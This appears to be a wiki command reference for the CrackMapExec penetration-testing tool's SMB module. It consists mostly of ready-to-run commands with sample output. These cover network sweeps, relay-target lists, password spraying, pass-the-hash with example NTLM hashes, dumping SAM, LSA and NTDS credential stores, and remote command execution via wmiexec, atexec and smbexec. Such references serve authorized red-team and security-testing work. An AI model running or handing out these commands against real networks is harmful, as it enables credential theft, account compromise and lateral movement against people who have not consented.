-
Notifications
You must be signed in to change notification settings - Fork 1.6k
SMB Command Reference
Updated: 7/27/18
CME Version:4.0.1dev
Notes about command reference:
The following use cases assume you have a Kali Linux host connected to an internal network.
For the examples it is also assumed hosts are within a 192.168.1.0/24 IP space.
If CME isnt giving output of anykind, you probably have something wrong with the command.
Returns a list of live hosts
#~ cme smb 192.168.1.0/24
Expected Results:
SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
SMB 192.168.1.110 445 DC2016A [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:DC2016A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
Maps the network of live hosts and saves a list of only the hosts that dont require SMB signing.
List format is one IP per line
#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt
Expected Results:
SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
...SNIP...
#~ cat relaylistOutputFilename.txt
192.168.1.111
192.168.1.117
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol
Failed logins result in a [-]
Successful logins result in a [+] Domain\Username:Password
Local admin access results in a (Pwn3d!) added after the login confirmation, shown below.
SMB 192.168.1.101 445 HOSTNAME [+] DOMAIN\Username:Password (Pwn3d!)
The following checks will attempt authentication to the entire /24 though a single target may also be used.
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
After obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
you can use both the full hash or just the nt hash (second half)
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u '' -p ''
If multiple domains are in play you may need to specify the target domain using -d
For example authenticating to the domain labnet.com
#~ cme smb 192.168.1.0/24 -u UserNAme -p "PASSWORDHERE" -d LABNET
You can use multiple usernames or passwords by seperating the names/passwords with a space.
#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
CME accepts txt files of usernames and passwords. One user/password per line. Watch out for account lockout!
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
*Note*: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list Usage example:
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
Adding --local-auth to any of the authentication commands with attempt to logon locally.
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
Results will display the hostname next to the user:password
SMB 192.168.1.101 445 HOSTNAME [+] HOSTNAME\Username:Password (Pwn3d!)
The following examples use a username and plaintext password although user/hash combos work as well.
*Requires Local Admin
***Requires Domain Admin or Local Admin Priviledges on target Domain Controller
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
2 methods are available:
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
additional drsuapi calls to convert the resultant linked-lists into readable format
vss - Uses the Volume Shadow copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
Options for spidering shares of remote systems.
Notice the '$' character has to be escaped. (example shown can be used as-is in a kali linux terminal)
#~ cme SMB <IP> -u USER -p PASSWORD --spider C\$ --pattern txt
Options for executing commands on remote systems.
CME has three different command execution methods:
-
wmiexecexecutes commands via WMI -
atexecexecutes commands by scheduling a task with windows task scheduler -
smbexecexecutes commands by creating and running a service
By default CME will fail over to a different execution method if one fails. It attempts to execute commands in the following order:
wmiexecatexecsmbexec
If you want to force CME to use only one execution method you can specify which one using the --exec-method flag.
The command execution method is denoted in the Executed Command output line.
WMIEXEC example, note the 'Executed command via wmiexec' output line.
root@EvilRick:~# cme smb 10.10.33.121 -u Administrator -p AAdmin\!23 -X '$PSVersionTable' --exec-method wmiexec
SMB 10.10.33.121 445 DESKTOP1 [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:DESKTOP1) (domain:PACIFIC) (signing:False) (SMBv1:True)
SMB 10.10.33.121 445 DESKTOP1 [+] PACIFIC\Administrator:AAdmin!23 (Pwn3d!)
SMB 10.10.33.121 445 DESKTOP1 [+] Executed command via wmiexec
SMB 10.10.33.121 445 DESKTOP1 Name Value
SMB 10.10.33.121 445 DESKTOP1 ---- -----
SMB 10.10.33.121 445 DESKTOP1 CLRVersion 2.0.50727.8793
SMB 10.10.33.121 445 DESKTOP1 BuildVersion 6.1.7601.17514
SMB 10.10.33.121 445 DESKTOP1 PSVersion 2.0
SMB 10.10.33.121 445 DESKTOP1 WSManStackVersion 2.0
SMB 10.10.33.121 445 DESKTOP1 PSCompatibleVersions {1.0, 2.0}
SMB 10.10.33.121 445 DESKTOP1 SerializationVersion 1.1.0.1
SMB 10.10.33.121 445 DESKTOP1 PSRemotingProtocolVersion 2.1
In the following example, we try to execute whoami on the target using the -x flag:
#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX [+] Executed command
SMB 192.168.10.11 445 WIN7BOX lab\administrator
You can also directly execute PowerShell commands using the -X flag:
#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX [+] Executed command
SMB 192.168.10.11 445 WIN7BOX Name Value
SMB 192.168.10.11 445 WIN7BOX ---- -----
SMB 192.168.10.11 445 WIN7BOX CLRVersion 2.0.50727.8793
SMB 192.168.10.11 445 WIN7BOX BuildVersion 6.1.7601.17514
SMB 192.168.10.11 445 WIN7BOX PSVersion 2.0
SMB 192.168.10.11 445 WIN7BOX WSManStackVersion 2.0
SMB 192.168.10.11 445 WIN7BOX PSCompatibleVersions {1.0, 2.0}
SMB 192.168.10.11 445 WIN7BOX SerializationVersion 1.1.0.1
SMB 192.168.10.11 445 WIN7BOX PSRemotingProtocolVersion 2.1
Powershell commands can be forced to run in a 32bit process:
#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '[System.Environment]::Is64BitProcess' --force-ps32
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX [+] Executed command
SMB 192.168.10.11 445 WIN7BOX false
Other switches include:
--no-output Does not retrieve command results
See more about wmi queries and syntax here: https://docs.microsoft.com/en-us/windows/desktop/wmisdk/invoking-a-synchronous-query
User/Password
#~ cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX Caption => C:
SMB 192.168.10.11 445 WIN7BOX Description => Local Fixed Disk
SMB 192.168.10.11 445 WIN7BOX InstallDate => 0
SMB 192.168.10.11 445 WIN7BOX Name => C:
SMB 192.168.10.11 445 WIN7BOX Status => 0
SMB 192.168.10.11 445 WIN7BOX Availability => 0
SMB 192.168.10.11 445 WIN7BOX CreationClassName => Win32_LogicalDisk
SMB 192.168.10.11 445 WIN7BOX ConfigManagerErrorCode => 0
SMB 192.168.10.11 445 WIN7BOX ConfigManagerUserConfig => 0
SMB 192.168.10.11 445 WIN7BOX DeviceID => C:
-Spidering Shares needs updates for the different available flags. -Powershell Scripts obfuscation switches: --obfs and --clear-obfscripts -SMB modules: Probably will create a seperate section.
-Figure out what/why change the wmi-namespace is about.
User/Password
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\cimv2'